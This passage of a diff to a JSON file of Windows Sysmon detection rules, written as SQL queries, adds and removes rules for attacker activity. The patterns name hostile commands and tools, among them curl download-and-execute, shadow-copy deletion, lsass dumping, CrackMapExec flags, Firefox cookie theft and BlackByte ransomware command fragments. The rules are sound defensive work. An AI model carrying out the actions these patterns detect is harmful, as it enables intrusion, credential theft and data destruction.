OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", @@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + 